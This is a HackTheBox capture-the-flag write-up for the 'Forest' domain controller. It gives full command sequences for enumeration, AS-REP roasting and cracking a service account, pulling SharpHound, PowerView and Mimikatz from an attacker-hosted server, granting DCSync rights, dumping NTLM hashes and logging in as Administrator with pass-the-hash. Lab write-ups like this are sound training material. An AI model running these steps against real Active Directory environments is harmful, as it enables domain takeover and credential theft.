CTF Forest

CTFHackTheBox
, , ,

Forest in an easy difficulty Windows Domain Controller (DC), for a domain in which Exchange Server has been installed. The DC is found to allow anonymous LDAP binds, which is used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.

Nmap

The provided nmap command has been used to perform a thorough port scan on the target host “forest.htb.” Here’s an overview of the scan’s results:

1
nmap -sVC -p- forest.htb -vvvv -Pn
  • Port 53 (TCP): Open - Simple DNS Plus
  • Port 88 (TCP): Open - Microsoft Windows Kerberos (Kerberos-sec)
  • Port 135 (TCP): Open - Microsoft Windows RPC
  • Port 139 (TCP): Open - Microsoft Windows netbios-ssn (NetBIOS Session Service)
  • Port 389 (TCP): Open - Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  • Port 445 (TCP): Open - Windows Server 2016 Standard 14393 (Microsoft-DS)
  • Port 464 (TCP): Open - Kerberos Key Distribution Center
  • Port 593 (TCP): Open - Microsoft Windows RPC over HTTP 1.0 (ncacn_http)
  • Port 636 (TCP): Open - TCPwrapped (encrypted LDAP)
  • Port 3268 (TCP): Open - Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  • Port 3269 (TCP): Open - TCPwrapped (encrypted LDAP)
  • Port 5985 (TCP): Open - Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • Port 9389 (TCP): Open - .NET Message Framing
  • Port 47001 (TCP): Open - Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • Port 49664 (TCP): Open - Microsoft Windows RPC
  • Port 49665 (TCP): Open - Microsoft Windows RPC
  • Ports 49666, 49667, 49671, 49676, 49677, 49684, 49706, 49932 (TCP): Open - Microsoft Windows RPC

Additionally, the scan provides some service information, including the host’s name (“FOREST”), its operating system (Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)).

The provided nmap output includes additional detailed information about the target host’s services and configuration. Here’s a summary of some notable findings from the output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 5324/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 32753/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 23443/udp): CLEAN (Timeout)
|   Check 4 (port 44587/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-08-01T22:01:08-07:00
| smb2-time: 
|   date: 2023-08-02T05:01:07
|_  start_date: 2023-08-02T04:37:05

Add FOREST.htb.local and forest to /etc/hosts
Domain: htb.local

RPCBind

The given commands use rpcclient to connect to “forest.htb” via SMB. It lists domain users using the enumdomusers command. This helps gather information about existing domain users on the target system.

1
2
rpcclient -U '' -N forest.htb
enumdomusers

The command queryuser 0x479 is used to retrieve information about the user associated with the ID 0x479.

1
queryuser 0x479

List of users

Sebastien Caron
Lucinda Berger
svc-alfresco
Andy Hislip
Mark Brandt
Santi Rodriguez

Get the password of svc-alfresco via kerberos

Get the hash

To retrieve a hash using Kerberos authentication, the following command is utilized:

1
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py -no-pass -dc-ip 10.10.10.161 htb/svc-alfresco -k -debug

This command employs the GetUserSPNs.py script from Impacket to fetch service principal names (SPNs) without providing a password (-no-pass). The -dc-ip flag specifies the domain controller’s IP address, and htb/svc-alfresco represents the service account. The -k flag indicates Kerberos authentication, and -debug enables debugging mode.

This is the hash.

1
$krb5asrep$23$svc-alfresco@HTB:c213afe360b7bcbf08a522dcb423566c$d849f59924ba2b5402b66ee1ef332c2c827c6a5f972c21ff329d7c3f084c8bc30b3f9a72ec9db43cba7fc47acf0b8e14c173b9ce692784b47ae494a4174851ae3fcbff6f839c833d3740b0e349f586cdb2a3273226d183f2d8c5586c25ad350617213ed0a61df199b0d84256f953f5cfff19874beb2cd0b3acfa837b1f33d0a1fc162969ba335d1870b33eea88b510bbab97ab3fec9013e33e4b13ed5c7f743e8e74eb3159a6c4cd967f2f5c6dd30ec590f63d9cc354598ec082c02fd0531fafcaaa5226cbf57bfe70d744fb543486ac2d60b05b7db29f482355a98aa65dff2f

Crack the hash

The command john -wordlist=/usr/share/wordlists/rockyou.txt hash uses the “john” tool to crack the provided hash using a wordlist (“rockyou.txt”).

1
john -wordlist=/usr/share/wordlists/rockyou.txt hash


Password of svc-alfresco: s3rvice

Get a shell with evil-winrm

The command evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice establishes remote Windows access using “evil-winrm” with the specified credentials.

1
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

evil-winrm provides a convenient command-line interface for interacting with Windows systems remotely over WinRM (Windows Remote Management).

Enumeration with BloodHound

SharpHound

To retrieve and execute the SharpHound tool, the following sequence of commands is employed:

  • Start a Python 2.7 HTTP server to host files:

    1
    python2.7 -m SimpleHTTPServer

  • Use PowerShell’s Invoke-WebRequest to download a file from the specified URI:

1
Invoke-WebRequest -Uri "http://10.10.14.23:8000/SharpHound.exe" -OutFile "SharpHound.exe"
  • Execute the downloaded SharpHound tool:
1
./SharpHound.exe -d htb.local

BloodHound

Now you have to drag and drop the datas into BloodHound.
Then select “Analysis” and “Find Shortest Paths to Domain admins”

Grant DCSync Privileges

  • Create a new user:
    1
    net user peanut peanutpeanut /add /domain

We have to add the user to 2 groups “EXCHANGE WINDOWS PERMISSIONS” and “Remote Management Users”.
There is 2 ways to add a user in a group, the first solution don’t work with the group Remote Management Users.

1
2
3
4
5
6
# First solution
net group "EXCHANGE WINDOWS PERMISSIONS" peanut /add /domain

# Second solution
$Group2 = Get-ADGroup -Identity "CN=Remote Management Users,CN=Builtin,DC=htb,DC=local"
Add-ADGroupMember -Identity $Group2 -Members peanut

Check the rights, you probably need to add the groups again if you are ne fast enough.

1
net user peanut

WriteDacl Exploit

PowerView.ps1 & Mimikatz upload

  • Download PowerView.ps1 & Mimikatz

    1
    2
    3
    wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

    wget https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

  • Start a Python HTTP server to host files:

    1
    python2.7 -m SimpleHTTPServer
1
2
3
# On the target, download there files
Invoke-WebRequest -Uri "http://10.10.14.23:8000/PowerView.ps1" -OutFile "PowerView.ps1"
Invoke-WebRequest -Uri "http://10.10.14.23:8000/Invoke-Mimikatz.ps1" -OutFile "Invoke-Mimikatz.ps1"

Get the Hashs - Method 1 (secretdump.py)

The provided commands guide you through various actions involving connecting to the target, importing scripts, and modifying domain object ACLs. Here’s an overview of each step:

  • Connect on the target with the new account.

    1
    evil-winrm -i 10.10.10.161 -u peanut -p peanutpeanut

  • Start PowerShell with Bypass Execution Policy:

    1
    powershell -ep bypass

  • Import PowerView.ps1:

    1
    Import-Module ./PowerView.ps1

  • Modify Domain Object ACLs

    1
    2
    3
    4
    5
    6
    $SecPassword = ConvertTo-SecureString 'peanutpeanut' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('HTB\dfm.a', $SecPassword)

    Add-DomainObjectAcl -Credential $Cred -TargetIdentity htb.local -Rights DCSync

    Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'peanut' -TargetIdentity 'HTB.LOCAL\\Domain Admins' -Rights DCSync

Get the Administrator hash

We use secretsdump.py script to extract credentials from the Windows system “forest.htb” using the provided “peanut” username and password.

1
/usr/share/doc/python3-impacket/examples/secretsdump.py peanut:[email protected]


We found the Administrator Hash.
Connect with evil-winrm:

1
evil-winrm -i forest.htb -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Get the Hashs - Method 1 (Mimikatz.ps1)

Connect on the target with the new account.

1
evil-winrm -i 10.10.10.161 -u peanut -p peanutpeanut

Then use Mimikatz to dump the hashes.

  • Import PowerShell Modules:

    1
    2
    Import-Module ./Invoke-Mimikatz.ps1
    Import-Module ./PowerView.ps1

    These commands load the Invoke-Mimikatz.ps1 and PowerView.ps1 scripts, allowing you to use their functions.

  • Modify Domain Object ACLs:

    1
    Add-DomainObjectAcl -TargetIdentity htb -PrincipalIdentity peanut -Rights DCSync -Verbose 2>&1

    This command grants the “peanut” user the DCSync rights on the “htb” domain, potentially allowing for credential extraction.

  • Invoke Mimikatz for DCSync:

    1
    Invoke-MimiKatz -Command """lsadump::dcsync /domain:htb.local /user:Administrator"""

    This command utilizes Mimikatz to request and dump the NTLM hash of the “Administrator” user in the “htb.local” domain, potentially facilitating further credential exploitation.


Connect to Administrator account with evil-winrm :

1
evil-winrm -i forest.htb -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6